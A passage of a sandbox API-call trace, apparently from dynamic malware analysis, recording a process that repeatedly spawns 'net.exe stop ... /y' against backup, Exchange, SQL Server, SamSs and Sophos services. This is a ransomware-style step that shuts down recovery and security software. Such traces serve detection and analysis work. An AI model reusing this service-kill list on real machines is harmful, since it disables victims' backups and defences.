GetFileType (hFile=0x3b8) returned 0x3 [0095.777] CloseHandle (hObject=0x3c8) returned 1 [0096.996] GetStdHandle (nStdHandle=0xfffffff6) returned 0x0 [0096.996] CreatePipe (in: hReadPipe=0x5d8f308, hWritePipe=0x5d8f304, lpPipeAttributes=0x5d8f288, nSize=0x0 | out: hReadPipe=0x5d8f308*=0x3c8, hWritePipe=0x5d8f304*=0x448) returned 1 [0096.996] GetCurrentProcess () returned 0xffffffff [0096.996] GetCurrentProcess () returned 0xffffffff [0096.996] DuplicateHandle (in: hSourceProcessHandle=0xffffffff, hSourceHandle=0x3c8, hTargetProcessHandle=0xffffffff, lpTargetHandle=0x5d8f30c, dwDesiredAccess=0x0, bInheritHandle=0, dwOptions=0x2 | out: lpTargetHandle=0x5d8f30c*=0x3c4) returned 1 [0096.996] CloseHandle (hObject=0x3c8) returned 1 [0096.996] GetStdHandle (nStdHandle=0xfffffff4) returned 0x0 [0096.996] CoTaskMemAlloc (cb=0x20e) returned 0x741d20 [0096.996] GetCurrentDirectoryW (in: nBufferLength=0x105, lpBuffer=0x741d20 | out: lpBuffer="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Programs\\Temp") returned 0x39 [0096.996] CoTaskMemFree (pv=0x741d20) [0096.997] CreateProcessW (in: lpApplicationName=0x0, lpCommandLine="\"net.exe\" stop PDVFSService /y", lpProcessAttributes=0x0, lpThreadAttributes=0x0, bInheritHandles=1, dwCreationFlags=0x8000000, lpEnvironment=0x0, lpCurrentDirectory="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Programs\\Temp", lpStartupInfo=0x5d8f250*(cb=0x44, lpReserved=0x0, lpDesktop=0x0, lpTitle=0x0, dwX=0x0, dwY=0x0, dwXSize=0x0, dwYSize=0x0, dwXCountChars=0x0, dwYCountChars=0x0, dwFillAttribute=0x0, dwFlags=0x100, wShowWindow=0x0, cbReserved2=0x0, lpReserved2=0x0, hStdInput=0x0, hStdOutput=0x448, hStdError=0x0), lpProcessInformation=0x24c0018 | out: lpCommandLine="\"net.exe\" stop PDVFSService /y", lpProcessInformation=0x24c0018*(hProcess=0x3b4, hThread=0x3c8, dwProcessId=0xec8, dwThreadId=0xecc)) returned 1 [0098.015] CloseHandle (hObject=0x448) returned 1 [0098.020] GetFileType (hFile=0x3c4) returned 0x3 [0098.020] CloseHandle (hObject=0x3c8) returned 1 [0099.479] GetStdHandle (nStdHandle=0xfffffff6) returned 0x0 [0099.479] CreatePipe (in: hReadPipe=0x5d8f308, hWritePipe=0x5d8f304, lpPipeAttributes=0x5d8f288, nSize=0x0 | out: hReadPipe=0x5d8f308*=0x448, hWritePipe=0x5d8f304*=0x3f8) returned 1 [0099.480] GetCurrentProcess () returned 0xffffffff [0099.480] GetCurrentProcess () returned 0xffffffff [0099.480] DuplicateHandle (in: hSourceProcessHandle=0xffffffff, hSourceHandle=0x448, hTargetProcessHandle=0xffffffff, lpTargetHandle=0x5d8f30c, dwDesiredAccess=0x0, bInheritHandle=0, dwOptions=0x2 | out: lpTargetHandle=0x5d8f30c*=0x37c) returned 1 [0099.480] CloseHandle (hObject=0x448) returned 1 [0099.480] GetStdHandle (nStdHandle=0xfffffff4) returned 0x0 [0099.480] CoTaskMemAlloc (cb=0x20e) returned 0x741d20 [0099.480] GetCurrentDirectoryW (in: nBufferLength=0x105, lpBuffer=0x741d20 | out: lpBuffer="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Programs\\Temp") returned 0x39 [0099.480] CoTaskMemFree (pv=0x741d20) [0099.480] CreateProcessW (in: lpApplicationName=0x0, lpCommandLine="\"net.exe\" stop BackupExecVSSProvider /y", lpProcessAttributes=0x0, lpThreadAttributes=0x0, bInheritHandles=1, dwCreationFlags=0x8000000, lpEnvironment=0x0, lpCurrentDirectory="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Programs\\Temp", lpStartupInfo=0x5d8f240*(cb=0x44, lpReserved=0x0, lpDesktop=0x0, lpTitle=0x0, dwX=0x0, dwY=0x0, dwXSize=0x0, dwYSize=0x0, dwXCountChars=0x0, dwYCountChars=0x0, dwFillAttribute=0x0, dwFlags=0x100, wShowWindow=0x0, cbReserved2=0x0, lpReserved2=0x0, hStdInput=0x0, hStdOutput=0x3f8, hStdError=0x0), lpProcessInformation=0x22751ac | out: lpCommandLine="\"net.exe\" stop BackupExecVSSProvider /y", lpProcessInformation=0x22751ac*(hProcess=0x3c8, hThread=0x448, dwProcessId=0xf20, dwThreadId=0xf24)) returned 1 [0099.928] CloseHandle (hObject=0x3f8) returned 1 [0099.928] GetFileType (hFile=0x37c) returned 0x3 [0099.928] CloseHandle (hObject=0x448) returned 1 [0100.358] GetStdHandle (nStdHandle=0xfffffff6) returned 0x0 [0100.358] CreatePipe (in: hReadPipe=0x5d8f308, hWritePipe=0x5d8f304, lpPipeAttributes=0x5d8f288, nSize=0x0 | out: hReadPipe=0x5d8f308*=0x38c, hWritePipe=0x5d8f304*=0x3f8) returned 1 [0100.358] GetCurrentProcess () returned 0xffffffff [0100.358] GetCurrentProcess () returned 0xffffffff [0100.359] DuplicateHandle (in: hSourceProcessHandle=0xffffffff, hSourceHandle=0x38c, hTargetProcessHandle=0xffffffff, lpTargetHandle=0x5d8f30c, dwDesiredAccess=0x0, bInheritHandle=0, dwOptions=0x2 | out: lpTargetHandle=0x5d8f30c*=0x3b8) returned 1 [0100.359] CloseHandle (hObject=0x38c) returned 1 [0100.359] GetStdHandle (nStdHandle=0xfffffff4) returned 0x0 [0100.359] CoTaskMemAlloc (cb=0x20e) returned 0x741d20 [0100.359] GetCurrentDirectoryW (in: nBufferLength=0x105, lpBuffer=0x741d20 | out: lpBuffer="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Programs\\Temp") returned 0x39 [0100.359] CoTaskMemFree (pv=0x741d20) [0100.359] CreateProcessW (in: lpApplicationName=0x0, lpCommandLine="\"net.exe\" stop BackupExecAgentAccelerator /y", lpProcessAttributes=0x0, lpThreadAttributes=0x0, bInheritHandles=1, dwCreationFlags=0x8000000, lpEnvironment=0x0, lpCurrentDirectory="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Programs\\Temp", lpStartupInfo=0x5d8f238*(cb=0x44, lpReserved=0x0, lpDesktop=0x0, lpTitle=0x0, dwX=0x0, dwY=0x0, dwXSize=0x0, dwYSize=0x0, dwXCountChars=0x0, dwYCountChars=0x0, dwFillAttribute=0x0, dwFlags=0x100, wShowWindow=0x0, cbReserved2=0x0, lpReserved2=0x0, hStdInput=0x0, hStdOutput=0x3f8, hStdError=0x0), lpProcessInformation=0x24822c8 | out: lpCommandLine="\"net.exe\" stop BackupExecAgentAccelerator /y", lpProcessInformation=0x24822c8*(hProcess=0x3a8, hThread=0x38c, dwProcessId=0xf98, dwThreadId=0xf9c)) returned 1 [0100.376] CloseHandle (hObject=0x3f8) returned 1 [0100.376] GetFileType (hFile=0x3b8) returned 0x3 [0100.376] CloseHandle (hObject=0x38c) returned 1 [0100.377] GetStdHandle (nStdHandle=0xfffffff6) returned 0x0 [0100.377] CreatePipe (in: hReadPipe=0x5d8f308, hWritePipe=0x5d8f304, lpPipeAttributes=0x5d8f288, nSize=0x0 | out: hReadPipe=0x5d8f308*=0x38c, hWritePipe=0x5d8f304*=0x3f8) returned 1 [0100.378] GetCurrentProcess () returned 0xffffffff [0100.378] GetCurrentProcess () returned 0xffffffff [0100.378] DuplicateHandle (in: hSourceProcessHandle=0xffffffff, hSourceHandle=0x38c, hTargetProcessHandle=0xffffffff, lpTargetHandle=0x5d8f30c, dwDesiredAccess=0x0, bInheritHandle=0, dwOptions=0x2 | out: lpTargetHandle=0x5d8f30c*=0x2f4) returned 1 [0100.378] CloseHandle (hObject=0x38c) returned 1 [0100.378] GetStdHandle (nStdHandle=0xfffffff4) returned 0x0 [0100.378] CoTaskMemAlloc (cb=0x20e) returned 0x741d20 [0100.379] GetCurrentDirectoryW (in: nBufferLength=0x105, lpBuffer=0x741d20 | out: lpBuffer="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Programs\\Temp") returned 0x39 [0100.379] CoTaskMemFree (pv=0x741d20) [0100.379] CreateProcessW (in: lpApplicationName=0x0, lpCommandLine="\"net.exe\" stop “Enterprise Client Service” /y", lpProcessAttributes=0x0, lpThreadAttributes=0x0, bInheritHandles=1, dwCreationFlags=0x8000000, lpEnvironment=0x0, lpCurrentDirectory="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Programs\\Temp", lpStartupInfo=0x5d8f234*(cb=0x44, lpReserved=0x0, lpDesktop=0x0, lpTitle=0x0, dwX=0x0, dwY=0x0, dwXSize=0x0, dwYSize=0x0, dwXCountChars=0x0, dwYCountChars=0x0, dwFillAttribute=0x0, dwFlags=0x100, wShowWindow=0x0, cbReserved2=0x0, lpReserved2=0x0, hStdInput=0x0, hStdOutput=0x3f8, hStdError=0x0), lpProcessInformation=0x2490654 | out: lpCommandLine="\"net.exe\" stop “Enterprise Client Service” /y", lpProcessInformation=0x2490654*(hProcess=0x2c4, hThread=0x38c, dwProcessId=0xfa0, dwThreadId=0xfa4)) returned 1 [0100.387] CloseHandle (hObject=0x3f8) returned 1 [0100.387] GetFileType (hFile=0x2f4) returned 0x3 [0100.387] CloseHandle (hObject=0x38c) returned 1 [0100.387] GetStdHandle (nStdHandle=0xfffffff6) returned 0x0 [0100.387] CreatePipe (in: hReadPipe=0x5d8f308, hWritePipe=0x5d8f304, lpPipeAttributes=0x5d8f288, nSize=0x0 | out: hReadPipe=0x5d8f308*=0x38c, hWritePipe=0x5d8f304*=0x3f8) returned 1 [0100.388] GetCurrentProcess () returned 0xffffffff [0100.388] GetCurrentProcess () returned 0xffffffff [0100.388] DuplicateHandle (in: hSourceProcessHandle=0xffffffff, hSourceHandle=0x38c, hTargetProcessHandle=0xffffffff, lpTargetHandle=0x5d8f30c, dwDesiredAccess=0x0, bInheritHandle=0, dwOptions=0x2 | out: lpTargetHandle=0x5d8f30c*=0x404) returned 1 [0100.388] CloseHandle (hObject=0x38c) returned 1 [0100.388] GetStdHandle (nStdHandle=0xfffffff4) returned 0x0 [0100.388] CoTaskMemAlloc (cb=0x20e) returned 0x741d20 [0100.388] GetCurrentDirectoryW (in: nBufferLength=0x105, lpBuffer=0x741d20 | out: lpBuffer="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Programs\\Temp") returned 0x39 [0100.388] CoTaskMemFree (pv=0x741d20) [0100.388] CreateProcessW (in: lpApplicationName=0x0, lpCommandLine="\"net.exe\" stop “SQL Backups /y", lpProcessAttributes=0x0, lpThreadAttributes=0x0, bInheritHandles=1, dwCreationFlags=0x8000000, lpEnvironment=0x0, lpCurrentDirectory="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Programs\\Temp", lpStartupInfo=0x5d8f250*(cb=0x44, lpReserved=0x0, lpDesktop=0x0, lpTitle=0x0, dwX=0x0, dwY=0x0, dwXSize=0x0, dwYSize=0x0, dwXCountChars=0x0, dwYCountChars=0x0, dwFillAttribute=0x0, dwFlags=0x100, wShowWindow=0x0, cbReserved2=0x0, lpReserved2=0x0, hStdInput=0x0, hStdOutput=0x3f8, hStdError=0x0), lpProcessInformation=0x2493f20 | out: lpCommandLine="\"net.exe\" stop “SQL Backups /y", lpProcessInformation=0x2493f20*(hProcess=0x3a0, hThread=0x38c, dwProcessId=0xfa8, dwThreadId=0xfac)) returned 1 [0100.394] CloseHandle (hObject=0x3f8) returned 1 [0100.394] GetFileType (hFile=0x404) returned 0x3 [0100.394] CloseHandle (hObject=0x38c) returned 1 [0100.395] GetStdHandle (nStdHandle=0xfffffff6) returned 0x0 [0100.395] CreatePipe (in: hReadPipe=0x5d8f308, hWritePipe=0x5d8f304, lpPipeAttributes=0x5d8f288, nSize=0x0 | out: hReadPipe=0x5d8f308*=0x38c, hWritePipe=0x5d8f304*=0x3f8) returned 1 [0100.395] GetCurrentProcess () returned 0xffffffff [0100.395] GetCurrentProcess () returned 0xffffffff [0100.395] DuplicateHandle (in: hSourceProcessHandle=0xffffffff, hSourceHandle=0x38c, hTargetProcessHandle=0xffffffff, lpTargetHandle=0x5d8f30c, dwDesiredAccess=0x0, bInheritHandle=0, dwOptions=0x2 | out: lpTargetHandle=0x5d8f30c*=0x418) returned 1 [0100.395] CloseHandle (hObject=0x38c) returned 1 [0100.395] GetStdHandle (nStdHandle=0xfffffff4) returned 0x0 [0100.395] CoTaskMemAlloc (cb=0x20e) returned 0x741d20 [0100.395] GetCurrentDirectoryW (in: nBufferLength=0x105, lpBuffer=0x741d20 | out: lpBuffer="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Programs\\Temp") returned 0x39 [0100.395] CoTaskMemFree (pv=0x741d20) [0100.395] CreateProcessW (in: lpApplicationName=0x0, lpCommandLine="\"net.exe\" stop MsDtsServer100 /y", lpProcessAttributes=0x0, lpThreadAttributes=0x0, bInheritHandles=1, dwCreationFlags=0x8000000, lpEnvironment=0x0, lpCurrentDirectory="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Programs\\Temp", lpStartupInfo=0x5d8f250*(cb=0x44, lpReserved=0x0, lpDesktop=0x0, lpTitle=0x0, dwX=0x0, dwY=0x0, dwXSize=0x0, dwYSize=0x0, dwXCountChars=0x0, dwYCountChars=0x0, dwFillAttribute=0x0, dwFlags=0x100, wShowWindow=0x0, cbReserved2=0x0, lpReserved2=0x0, hStdInput=0x0, hStdOutput=0x3f8, hStdError=0x0), lpProcessInformation=0x24977d0 | out: lpCommandLine="\"net.exe\" stop MsDtsServer100 /y", lpProcessInformation=0x24977d0*(hProcess=0x408, hThread=0x38c, dwProcessId=0xfb0, dwThreadId=0xfb4)) returned 1 [0100.399] CloseHandle (hObject=0x3f8) returned 1 [0100.400] GetFileType (hFile=0x418) returned 0x3 [0100.400] CloseHandle (hObject=0x38c) returned 1 [0100.400] GetStdHandle (nStdHandle=0xfffffff6) returned 0x0 [0100.400] CreatePipe (in: hReadPipe=0x5d8f308, hWritePipe=0x5d8f304, lpPipeAttributes=0x5d8f288, nSize=0x0 | out: hReadPipe=0x5d8f308*=0x38c, hWritePipe=0x5d8f304*=0x3f8) returned 1 [0100.400] GetCurrentProcess () returned 0xffffffff [0100.400] GetCurrentProcess () returned 0xffffffff [0100.400] DuplicateHandle (in: hSourceProcessHandle=0xffffffff, hSourceHandle=0x38c, hTargetProcessHandle=0xffffffff, lpTargetHandle=0x5d8f30c, dwDesiredAccess=0x0, bInheritHandle=0, dwOptions=0x2 | out: lpTargetHandle=0x5d8f30c*=0x424) returned 1 [0100.400] CloseHandle (hObject=0x38c) returned 1 [0100.400] GetStdHandle (nStdHandle=0xfffffff4) returned 0x0 [0100.400] CoTaskMemAlloc (cb=0x20e) returned 0x741d20 [0100.400] GetCurrentDirectoryW (in: nBufferLength=0x105, lpBuffer=0x741d20 | out: lpBuffer="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Programs\\Temp") returned 0x39 [0100.400] CoTaskMemFree (pv=0x741d20) [0100.400] CreateProcessW (in: lpApplicationName=0x0, lpCommandLine="\"net.exe\" stop NetMsmqActivator /y", lpProcessAttributes=0x0, lpThreadAttributes=0x0, bInheritHandles=1, dwCreationFlags=0x8000000, lpEnvironment=0x0, lpCurrentDirectory="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Programs\\Temp", lpStartupInfo=0x5d8f24c*(cb=0x44, lpReserved=0x0, lpDesktop=0x0, lpTitle=0x0, dwX=0x0, dwY=0x0, dwXSize=0x0, dwYSize=0x0, dwXCountChars=0x0, dwYCountChars=0x0, dwFillAttribute=0x0, dwFlags=0x100, wShowWindow=0x0, cbReserved2=0x0, lpReserved2=0x0, hStdInput=0x0, hStdOutput=0x3f8, hStdError=0x0), lpProcessInformation=0x249b088 | out: lpCommandLine="\"net.exe\" stop NetMsmqActivator /y", lpProcessInformation=0x249b088*(hProcess=0x41c, hThread=0x38c, dwProcessId=0xfb8, dwThreadId=0xfbc)) returned 1 [0100.404] CloseHandle (hObject=0x3f8) returned 1 [0100.404] GetFileType (hFile=0x424) returned 0x3 [0100.404] CloseHandle (hObject=0x38c) returned 1 [0100.404] GetStdHandle (nStdHandle=0xfffffff6) returned 0x0 [0100.405] CreatePipe (in: hReadPipe=0x5d8f308, hWritePipe=0x5d8f304, lpPipeAttributes=0x5d8f288, nSize=0x0 | out: hReadPipe=0x5d8f308*=0x38c, hWritePipe=0x5d8f304*=0x3f8) returned 1 [0100.405] GetCurrentProcess () returned 0xffffffff [0100.405] GetCurrentProcess () returned 0xffffffff [0100.405] DuplicateHandle (in: hSourceProcessHandle=0xffffffff, hSourceHandle=0x38c, hTargetProcessHandle=0xffffffff, lpTargetHandle=0x5d8f30c, dwDesiredAccess=0x0, bInheritHandle=0, dwOptions=0x2 | out: lpTargetHandle=0x5d8f30c*=0x438) returned 1 [0100.405] CloseHandle (hObject=0x38c) returned 1 [0100.405] GetStdHandle (nStdHandle=0xfffffff4) returned 0x0 [0100.405] CoTaskMemAlloc (cb=0x20e) returned 0x741d20 [0100.405] GetCurrentDirectoryW (in: nBufferLength=0x105, lpBuffer=0x741d20 | out: lpBuffer="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Programs\\Temp") returned 0x39 [0100.405] CoTaskMemFree (pv=0x741d20) [0100.405] CreateProcessW (in: lpApplicationName=0x0, lpCommandLine="\"net.exe\" stop MSExchangeIS /y", lpProcessAttributes=0x0, lpThreadAttributes=0x0, bInheritHandles=1, dwCreationFlags=0x8000000, lpEnvironment=0x0, lpCurrentDirectory="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Programs\\Temp", lpStartupInfo=0x5d8f250*(cb=0x44, lpReserved=0x0, lpDesktop=0x0, lpTitle=0x0, dwX=0x0, dwY=0x0, dwXSize=0x0, dwYSize=0x0, dwXCountChars=0x0, dwYCountChars=0x0, dwFillAttribute=0x0, dwFlags=0x100, wShowWindow=0x0, cbReserved2=0x0, lpReserved2=0x0, hStdInput=0x0, hStdOutput=0x3f8, hStdError=0x0), lpProcessInformation=0x249e940 | out: lpCommandLine="\"net.exe\" stop MSExchangeIS /y", lpProcessInformation=0x249e940*(hProcess=0x430, hThread=0x38c, dwProcessId=0xfc0, dwThreadId=0xfc4)) returned 1 [0100.409] CloseHandle (hObject=0x3f8) returned 1 [0100.409] GetFileType (hFile=0x438) returned 0x3 [0100.410] CloseHandle (hObject=0x38c) returned 1 [0100.410] GetStdHandle (nStdHandle=0xfffffff6) returned 0x0 [0100.410] CreatePipe (in: hReadPipe=0x5d8f308, hWritePipe=0x5d8f304, lpPipeAttributes=0x5d8f288, nSize=0x0 | out: hReadPipe=0x5d8f308*=0x38c, hWritePipe=0x5d8f304*=0x3f8) returned 1 [0100.410] GetCurrentProcess () returned 0xffffffff [0100.410] GetCurrentProcess () returned 0xffffffff [0100.410] DuplicateHandle (in: hSourceProcessHandle=0xffffffff, hSourceHandle=0x38c, hTargetProcessHandle=0xffffffff, lpTargetHandle=0x5d8f30c, dwDesiredAccess=0x0, bInheritHandle=0, dwOptions=0x2 | out: lpTargetHandle=0x5d8f30c*=0x450) returned 1 [0100.410] CloseHandle (hObject=0x38c) returned 1 [0100.410] GetStdHandle (nStdHandle=0xfffffff4) returned 0x0 [0100.411] CoTaskMemAlloc (cb=0x20e) returned 0x741d20 [0100.411] GetCurrentDirectoryW (in: nBufferLength=0x105, lpBuffer=0x741d20 | out: lpBuffer="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Programs\\Temp") returned 0x39 [0100.411] CoTaskMemFree (pv=0x741d20) [0100.411] CreateProcessW (in: lpApplicationName=0x0, lpCommandLine="\"net.exe\" stop “Sophos AutoUpdate Service” /y", lpProcessAttributes=0x0, lpThreadAttributes=0x0, bInheritHandles=1, dwCreationFlags=0x8000000, lpEnvironment=0x0, lpCurrentDirectory="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Programs\\Temp", lpStartupInfo=0x5d8f234*(cb=0x44, lpReserved=0x0, lpDesktop=0x0, lpTitle=0x0, dwX=0x0, dwY=0x0, dwXSize=0x0, dwYSize=0x0, dwXCountChars=0x0, dwYCountChars=0x0, dwFillAttribute=0x0, dwFlags=0x100, wShowWindow=0x0, cbReserved2=0x0, lpReserved2=0x0, hStdInput=0x0, hStdOutput=0x3f8, hStdError=0x0), lpProcessInformation=0x24a220c | out: lpCommandLine="\"net.exe\" stop “Sophos AutoUpdate Service” /y", lpProcessInformation=0x24a220c*(hProcess=0x44c, hThread=0x38c, dwProcessId=0xfc8, dwThreadId=0xfcc)) returned 1 [0101.079] CloseHandle (hObject=0x3f8) returned 1 [0101.080] GetFileType (hFile=0x450) returned 0x3 [0101.080] CloseHandle (hObject=0x38c) returned 1 [0102.162] GetStdHandle (nStdHandle=0xfffffff6) returned 0x0 [0102.162] CreatePipe (in: hReadPipe=0x5d8f308, hWritePipe=0x5d8f304, lpPipeAttributes=0x5d8f288, nSize=0x0 | out: hReadPipe=0x5d8f308*=0x3f8, hWritePipe=0x5d8f304*=0x470) returned 1 [0102.163] GetCurrentProcess () returned 0xffffffff [0102.163] GetCurrentProcess () returned 0xffffffff [0102.163] DuplicateHandle (in: hSourceProcessHandle=0xffffffff, hSourceHandle=0x3f8, hTargetProcessHandle=0xffffffff, lpTargetHandle=0x5d8f30c, dwDesiredAccess=0x0, bInheritHandle=0, dwOptions=0x2 | out: lpTargetHandle=0x5d8f30c*=0x46c) returned 1 [0102.163] CloseHandle (hObject=0x3f8) returned 1 [0102.163] GetStdHandle (nStdHandle=0xfffffff4) returned 0x0 [0102.163] CoTaskMemAlloc (cb=0x20e) returned 0x741d20 [0102.163] GetCurrentDirectoryW (in: nBufferLength=0x105, lpBuffer=0x741d20 | out: lpBuffer="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Programs\\Temp") returned 0x39 [0102.163] CoTaskMemFree (pv=0x741d20) [0102.163] CreateProcessW (in: lpApplicationName=0x0, lpCommandLine="\"net.exe\" stop SamSs /y", lpProcessAttributes=0x0, lpThreadAttributes=0x0, bInheritHandles=1, dwCreationFlags=0x8000000, lpEnvironment=0x0, lpCurrentDirectory="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Programs\\Temp", lpStartupInfo=0x5d8f250*(cb=0x44, lpReserved=0x0, lpDesktop=0x0, lpTitle=0x0, dwX=0x0, dwY=0x0, dwXSize=0x0, dwYSize=0x0, dwXCountChars=0x0, dwYCountChars=0x0, dwFillAttribute=0x0, dwFlags=0x100, wShowWindow=0x0, cbReserved2=0x0, lpReserved2=0x0, hStdInput=0x0, hStdOutput=0x470, hStdError=0x0), lpProcessInformation=0x2297cb4 | out: lpCommandLine="\"net.exe\" stop SamSs /y", lpProcessInformation=0x2297cb4*(hProcess=0x45c, hThread=0x3f8, dwProcessId=0x62c, dwThreadId=0x63c)) returned 1 [0103.137] CloseHandle (hObject=0x470) returned 1 [0103.137] GetFileType (hFile=0x46c) returned 0x3 [0103.137] CloseHandle (hObject=0x3f8) returned 1 [0103.994] GetStdHandle (nStdHandle=0xfffffff6) returned 0x0 [0103.994] CreatePipe (in: hReadPipe=0x5d8f308, hWritePipe=0x5d8f304, lpPipeAttributes=0x5d8f288, nSize=0x0 | out: hReadPipe=0x5d8f308*=0x470, hWritePipe=0x5d8f304*=0x448) returned 1 [0103.994] GetCurrentProcess () returned 0xffffffff [0103.994] GetCurrentProcess () returned 0xffffffff [0103.994] DuplicateHandle (in: hSourceProcessHandle=0xffffffff, hSourceHandle=0x470, hTargetProcessHandle=0xffffffff, lpTargetHandle=0x5d8f30c, dwDesiredAccess=0x0, bInheritHandle=0, dwOptions=0x2 | out: lpTargetHandle=0x5d8f30c*=0x430) returned 1 [0103.994] CloseHandle (hObject=0x470) returned 1 [0103.994] GetStdHandle (nStdHandle=0xfffffff4) returned 0x0 [0103.994] CoTaskMemAlloc (cb=0x20e) returned 0x741d20 [0103.994] GetCurrentDirectoryW (in: nBufferLength=0x105, lpBuffer=0x741d20 | out: lpBuffer="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Programs\\Temp") returned 0x39 [0103.995] CoTaskMemFree (pv=0x741d20) [0103.995] CreateProcessW (in: lpApplicationName=0x0, lpCommandLine="\"net.exe\" stop ReportServer /y", lpProcessAttributes=0x0, lpThreadAttributes=0x0, bInheritHandles=1, dwCreationFlags=0x8000000, lpEnvironment=0x0, lpCurrentDirectory="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Programs\\Temp", lpStartupInfo=0x5d8f250*(cb=0x44, lpReserved=0x0, lpDesktop=0x0, lpTitle=0x0, dwX=0x0, dwY=0x0, dwXSize=0x0, dwYSize=0x0, dwXCountChars=0x0, dwYCountChars=0x0, dwFillAttribute=0x0, dwFlags=0x100, wShowWindow=0x0, cbReserved2=0x0, lpReserved2=0x0, hStdInput=0x0, hStdOutput=0x448, hStdError=0x0), lpProcessInformation=0x2274730 | out: lpCommandLine="\"net.exe\" stop ReportServer /y", lpProcessInformation=0x2274730*(hProcess=0x464, hThread=0x470, dwProcessId=0xe84, dwThreadId=0x974)) returned 1 [0104.162] CloseHandle (hObject=0x448) returned 1 [0104.162] GetFileType (hFile=0x430) returned 0x3 [0104.162] CloseHandle (hObject=0x470) returned 1 [0105.610] GetStdHandle (nStdHandle=0xfffffff6) returned 0x0 [0105.610] CreatePipe (in: hReadPipe=0x5d8f308, hWritePipe=0x5d8f304, lpPipeAttributes=0x5d8f288, nSize=0x0 | out: hReadPipe=0x5d8f308*=0x3b4, hWritePipe=0x5d8f304*=0x448) returned 1 [0105.610] GetCurrentProcess () returned 0xffffffff [0105.610] GetCurrentProcess () returned 0xffffffff [0105.610] DuplicateHandle (in: hSourceProcessHandle=0xffffffff, hSourceHandle=0x3b4, hTargetProcessHandle=0xffffffff, lpTargetHandle=0x5d8f30c, dwDesiredAccess=0x0, bInheritHandle=0, dwOptions=0x2 | out: lpTargetHandle=0x5d8f30c*=0x44c) returned 1 [0105.611] CloseHandle (hObject=0x3b4) returned 1 [0105.611] GetStdHandle (nStdHandle=0xfffffff4) returned 0x0 [0105.611] CoTaskMemAlloc (cb=0x20e) returned 0x741d20 [0105.611] GetCurrentDirectoryW (in: nBufferLength=0x105, lpBuffer=0x741d20 | out: lpBuffer="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Programs\\Temp") returned 0x39 [0105.611] CoTaskMemFree (pv=0x741d20) [0105.611] CreateProcessW (in: lpApplicationName=0x0, lpCommandLine="\"net.exe\" stop “SQLsafe Backup Service” /y", lpProcessAttributes=0x0, lpThreadAttributes=0x0, bInheritHandles=1, dwCreationFlags=0x8000000, lpEnvironment=0x0, lpCurrentDirectory="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Programs\\Temp", lpStartupInfo=0x5d8f23c*(cb=0x44, lpReserved=0x0, lpDesktop=0x0, lpTitle=0x0, dwX=0x0, dwY=0x0, dwXSize=0x0, dwYSize=0x0, dwXCountChars=0x0, dwYCountChars=0x0, dwFillAttribute=0x0, dwFlags=0x100, wShowWindow=0x0, cbReserved2=0x0, lpReserved2=0x0, hStdInput=0x0, hStdOutput=0x448, hStdError=0x0), lpProcessInformation=0x228b580 | out: lpCommandLine="\"net.exe\" stop “SQLsafe Backup Service” /y", lpProcessInformation=0x228b580*(hProcess=0x3c4, hThread=0x3b4, dwProcessId=0x324, dwThreadId=0x61c)) returned 1 [0105.622] CloseHandle (hObject=0x448) returned 1 [0105.622] GetFileType (hFile=0x44c) returned 0x3 [0105.622] CloseHandle (hObject=0x3b4) returned 1 [0106.358] GetStdHandle (nStdHandle=0xfffffff6) returned 0x0 [0106.358] CreatePipe (in: hReadPipe=0x5d8f308, hWritePipe=0x5d8f304, lpPipeAttributes=0x5d8f288, nSize=0x0 | out: hReadPipe=0x5d8f308*=0x448, hWritePipe=0x5d8f304*=0x47c) returned 1 [0106.358] GetCurrentProcess () returned 0xffffffff [0106.358] GetCurrentProcess () returned 0xffffffff [0106.358] DuplicateHandle (in: hSourceProcessHandle=0xffffffff, hSourceHandle=0x448, hTargetProcessHandle=0xffffffff, lpTargetHandle=0x5d8f30c, dwDesiredAccess=0x0, bInheritHandle=0, dwOptions=0x2 | out: lpTargetHandle=0x5d8f30c*=0x4a0) returned 1 [0106.358] CloseHandle (hObject=0x448) returned 1 [0106.358] GetStdHandle (nStdHandle=0xfffffff4) returned 0x0 [0106.358] CoTaskMemAlloc (cb=0x20e) returned 0x741d20 [0106.358] GetCurrentDirectoryW (in: nBufferLength=0x105, lpBuffer=0x741d20 | out: lpBuffer="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Programs\\Temp") returned 0x39 [0106.358] CoTaskMemFree (pv=0x741d20) [0106.359] CreateProcessW (in: lpApplicationName=0x0, lpCommandLine="\"net.exe\" stop MsDtsServer110 /y", lpProcessAttributes=0x0, lpThreadAttributes=0x0, bInheritHandles=1, dwCreationFlags=0x8000000, lpEnvironment=0x0, lpCurrentDirectory="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Programs\\Temp", lpStartupInfo=0x5d8f250*(cb=0x44, lpReserved=0x0, lpDesktop=0x0, lpTitle=0x0, dwX=0x0, dwY=0x0, dwXSize=0x0, dwYSize=0x0, dwXCountChars=0x0, dwYCountChars=0x0, dwFillAttribute=0x0, dwFlags=0x100, 